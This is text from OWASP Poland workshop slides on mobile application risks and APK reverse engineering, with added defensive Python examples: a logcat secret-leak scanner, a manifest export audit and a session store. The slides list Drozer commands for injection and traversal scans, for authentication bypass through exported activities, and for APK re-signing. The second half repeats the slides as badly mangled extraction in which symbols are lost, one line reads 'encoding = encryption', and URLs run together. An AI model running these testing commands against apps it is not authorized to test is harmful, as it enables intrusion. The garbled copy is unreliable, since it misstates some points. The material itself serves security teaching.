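lrwxrwxrwx 1 root   root     40 2016-02-24 10:00 lib -> /data/app/com.example.vulnapp-1/lib/arm

/data/data/com.example.vulnapp/databases:
-rw-rw---- 1 u0_a80 u0_a80 20480 2016-02-24 10:01 app.db
-rw-rw-r-- 1 u0_a80 u0_a80  8192 2016-02-24 10:01 cache.db

/data/data/com.example.vulnapp/shared_prefs:
-rw-rw---- 1 u0_a80 u0_a80   312 2016-02-24 10:02 settings.xml
-rw-rw-rw- 1 u0_a80 u0_a80   198 2016-02-24 10:02 creds.xml
"""

if __name__ == "__main__":
    for e in scan_listing(SAMPLE_LISTING, "/data/data/com.example.vulnapp"):
        print("%s %s (%s)" % (e.mode, e.path, ", ".join(e.issues)))
```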
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
– Using known weak protocol versions/ciphers (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, via ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
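Added example, not code from the workshop: the "use logcat to verify what is being logged" check from the previous slide as a scanner over `adb logcat -v threadtime` lines, optionally restricted to the app's PID the way the output filter would be. The log lines, tags and values are constructed; the card number is the well-known 4111... test number.

```python
"""Scan logcat output for data an app should never write to the log.

Added example, not from the slides. Anything found here also ends up in crash
logs and bug reports. The sample log is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# threadtime format: "02-24 10:05:12.345  1234  1250 D LoginActivity: message"
_LOGLINE = re.compile(
    r"^(\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+(\d+)\s+(\d+)\s+([VDIWEF])\s+(.*?):\s(.*)$")

# (category, pattern) rules applied to the message part of every line
_RULES = [
    ("credential", re.compile(r"\b(?:pass(?:word|wd)?|pwd|pin)\s*[=:]\s*\S+", re.I)),
    ("bearer-token", re.compile(r"\bAuthorization:\s*(?:Bearer|Basic)\s+\S+", re.I)),
    ("api-token", re.compile(r"\b(?:token|api[_-]?key|secret)\s*[=:]\s*\S{8,}", re.I)),
    ("email", re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")),
    ("geolocation", re.compile(
        r"\blat(?:itude)?\s*[=:]\s*-?\d+\.\d+.*\blon(?:g|gitude)?\s*[=:]\s*-?\d+\.\d+", re.I)),
    ("jwt", re.compile(r"\beyJ[\w-]+\.[\w-]+\.[\w-]*")),
]
# 13-19 digits, optionally grouped with spaces or hyphens; confirmed with Luhn below
_DIGITS = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so that timestamps and IDs are not reported as cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


@dataclass
class Leak:
    line_no: int
    tag: str
    category: str
    excerpt: str


def scan_logcat(text: str, pid: Optional[int] = None) -> List[Leak]:
    """Return one Leak per rule hit; pid restricts the scan to one process."""
    leaks = []
    for n, line in enumerate(text.splitlines(), 1):
        m = _LOGLINE.match(line)
        if not m:
            continue
        _, line_pid, _, _, tag, msg = m.groups()
        if pid is not None and int(line_pid) != pid:
            continue                          # same effect as filtering on the PID
        for category, pat in _RULES:
            hit = pat.search(msg)
            if hit:
                leaks.append(Leak(n, tag.strip(), category, hit.group(0)[:60]))
        for hit in _DIGITS.finditer(msg):
            if luhn_ok(re.sub(r"\D", "", hit.group(0))):
                leaks.append(Leak(n, tag.strip(), "card-number", hit.group(0).strip()))
    return leaks


# Constructed sample: PID 1234 is the app under test, the others are noise.
SAMPLE_LOG = """\
02-24 10:05:12.345  1234  1250 D LoginActivity: POST /login user=alice password=Hunter2!
02-24 10:05:12.512  1234  1250 I OkHttp  : --> Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.c2ln
02-24 10:05:13.001  1234  1251 V Analytics: sending location lat=51.1079 lon=17.0385
02-24 10:05:13.100  1234  1250 D LoginActivity: login ok for alice@example.com
02-24 10:05:13.400  1234  1250 D Checkout: card 4111 1111 1111 1111 stored for next time
02-24 10:05:14.000   987   990 I ActivityManager: Displayed com.example.vulnapp/.MainActivity
02-24 10:05:15.000  4321  4321 D OtherApp: password=notours
"""

if __name__ == "__main__":
    for leak in scan_logcat(SAMPLE_LOG, pid=1234):
        print("line %d [%s] %s: %s" % (leak.line_no, leak.tag, leak.category, leak.excerpt))
```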
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– Another application, via an intent/content provider
– A shared file
– A server response
– A third party website
Client side injection – what to inject
• SQL injection into a local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
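Added example, not code from the workshop, serving both the mitigations above and the earlier "General defenses for App Components" slide (android:exported="false", custom permissions): it automates the review that `dz> run app.package.manifest` and `app.activity.info` let you do by hand, reading an AndroidManifest.xml and rating every component by whether other apps can reach it, explicitly through android:exported or implicitly through an <intent-filter>. The package name and the manifest are constructed.

```python
"""Static audit of AndroidManifest.xml for components other apps can reach.

Added example, not from the slides. Defaults follow the platform rules in
force for the targetSdk used here: activities, services and receivers are
exported when they declare an <intent-filter>; providers only below API 17.
The sample manifest and package are constructed.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def _attr(elem: ET.Element, name: str) -> Optional[str]:
    """Read an android:<name> attribute, or None when it is absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _is_launcher(elem: ET.Element) -> bool:
    """True for the MAIN/LAUNCHER activity, which has to be exported anyway."""
    for flt in elem.findall("intent-filter"):
        actions = {_attr(a, "name") for a in flt.findall("action")}
        cats = {_attr(c, "name") for c in flt.findall("category")}
        if ("android.intent.action.MAIN" in actions
                and "android.intent.category.LAUNCHER" in cats):
            return True
    return False


@dataclass
class Finding:
    name: str                  # android:name of the component
    kind: str                  # activity / service / receiver / provider
    exported: bool
    implicit: bool             # exported only because of an <intent-filter>
    permission: Optional[str]  # android:permission guarding the component
    has_filter: bool
    launcher: bool

    @property
    def risk(self) -> str:
        if self.launcher:
            return "ok"        # the one component every app must export
        if not self.exported:
            # The slide's caveat: a filter on a non-exported component still
            # registers it for implicit intents, so it deserves a second look.
            return "info" if self.has_filter else "ok"
        if self.permission is None:
            return "high"      # any app on the device can talk to it
        return "medium"        # reachable, but gated by a custom permission


def audit_manifest(xml_text: str) -> List[Finding]:
    """Return one Finding per component declared under <application>."""
    root = ET.fromstring(xml_text)
    sdk = root.find("uses-sdk")
    target = int(_attr(sdk, "targetSdkVersion") or 0) if sdk is not None else 0
    app = root.find("application")
    findings = []
    for elem in (app if app is not None else []):
        if elem.tag not in COMPONENT_TAGS:
            continue
        has_filter = elem.find("intent-filter") is not None
        declared = _attr(elem, "exported")
        if declared is not None:
            exported, implicit = declared.lower() == "true", False
        elif elem.tag == "provider":
            exported, implicit = target < 17, True
        else:
            exported, implicit = has_filter, True
        findings.append(Finding(
            name=_attr(elem, "name") or "?", kind=elem.tag, exported=exported,
            implicit=implicit, permission=_attr(elem, "permission"),
            has_filter=has_filter, launcher=_is_launcher(elem)))
    return findings


def risk_table(xml_text: str) -> dict:
    """Map component name -> risk label (for reports and tests)."""
    return {f.name: f.risk for f in audit_manifest(xml_text)}


# Constructed manifest for a hypothetical package (not a real app).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.vulnapp">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="23"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.vulnapp.permission.SYNC"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <activity android:name=".InternalActivity" android:exported="false">
      <intent-filter>
        <action android:name="com.example.vulnapp.INTERNAL"/>
      </intent-filter>
    </activity>
    <provider android:name=".DataProvider"
              android:authorities="com.example.vulnapp.data"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        why = "implicit via intent-filter" if f.implicit else "declared"
        print("%-6s %-9s %-18s exported=%s (%s) permission=%s"
              % (f.risk, f.kind, f.name, f.exported, why, f.permission))
```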
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– Verify if a session expires (copy a cookie and try to use it after 30 minutes)
– Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
– Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
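Added example, not code from the workshop: server-side session handling that passes the three checks on the "how to find" slide (expiry after inactivity, destruction of every token when the authentication state changes, tokens that cannot be guessed) and a cheap entropy heuristic for judging tokens captured in a proxy. Timeouts, user names and the device-ID-shaped token are constructed.

```python
"""In-memory session store implementing the M9 mitigations.

Added example, not from the slides. Idle/absolute timeouts and user names
are constructed; time is passed in explicitly so the behaviour is testable.
"""
import math
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

IDLE_TIMEOUT = 30 * 60         # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600    # hard cap on a session's lifetime, activity or not
MIN_TOKEN_BITS = 80            # below this a token is treated as guessable


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


@dataclass
class SessionStore:
    sessions: Dict[str, Session] = field(default_factory=dict)

    def create(self, user: str, now: float) -> str:
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self.sessions[token] = Session(user, now, now)
        return token

    def lookup(self, token: str, now: float) -> Optional[str]:
        """User owning a live session, or None (the token is dropped) if expired."""
        s = self.sessions.get(token)
        if s is None:
            return None
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT:
            del self.sessions[token]        # invalidated on the server side
            return None
        s.last_seen = now
        return s.user

    def invalidate(self, token: str) -> None:
        """Explicit logout: the token must not work afterwards."""
        self.sessions.pop(token, None)

    def on_auth_change(self, user: str, now: float) -> str:
        """Login, password change or privilege switch: destroy every token
        the user holds and hand out a fresh one."""
        for t in [t for t, s in self.sessions.items() if s.user == user]:
            del self.sessions[t]
        return self.create(user, now)


def token_entropy_bits(token: str) -> float:
    """Upper bound on the token's entropy from its length and alphabet size."""
    alphabet = len(set(token))
    return len(token) * math.log2(alphabet) if alphabet > 1 else 0.0


def token_looks_guessable(token: str) -> bool:
    """Review heuristic: a 16-hex-digit Android ID or a numeric counter fails,
    a token from secrets.token_urlsafe(32) passes comfortably."""
    return token_entropy_bits(token) < MIN_TOKEN_BITS


if __name__ == "__main__":
    store = SessionStore()
    t = store.create("alice", 0.0)
    print("after 29 min:", store.lookup(t, 29 * 60.0))     # alice
    print("after 31 more:", store.lookup(t, 60 * 60.0))    # None, idle timeout
    print("android-id-shaped token guessable:", token_looks_guessable("9774d56d682e549c"))
```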
Thank you
pawel.rzepa@outlook.com
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
